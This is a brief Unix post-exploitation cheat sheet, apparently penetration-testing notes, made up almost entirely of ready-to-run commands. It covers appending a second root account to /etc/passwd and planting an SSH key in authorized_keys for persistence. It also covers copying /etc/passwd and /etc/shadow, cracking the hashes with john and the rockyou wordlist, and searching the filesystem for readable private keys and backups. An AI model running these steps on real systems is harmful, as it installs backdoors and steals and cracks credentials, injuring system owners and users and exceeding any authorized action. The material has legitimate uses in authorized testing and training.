Unix Post-Exploitation

Persistence

Add a second root user

echo root2:$(openssl passwd PreciouS):0:0:root:/root:/bin/bash >> /etc/passwd

Add ssh key

See SSH.

scp ~/.ssh/id_rsa.pub someuser@${IP}:~/.ssh/authorized_keys

Copy content of /etc/passwd and /etc/shadow

Copy content of /etc/passwd and /etc/shadow to Kali (Ctrl+C/Ctrl+V)

/usr/sbin/unshadow passwd shadow > unshadowed

Crack passwords

WL=/usr/share/wordlists/rockyou.txt
john --wordlist=$WL unshadowed

Other things to check

• Look for scripts
• Look at other users’ home directories (/home/<username>)
• Look for ssh keys in .ssh directories

find / -name *.bak
find / -name *private* -type f -readable 2>/dev/null -exec ls -la {} \;
find / -name *_key* -type f -readable 2>/dev/null -exec ls -la {} \;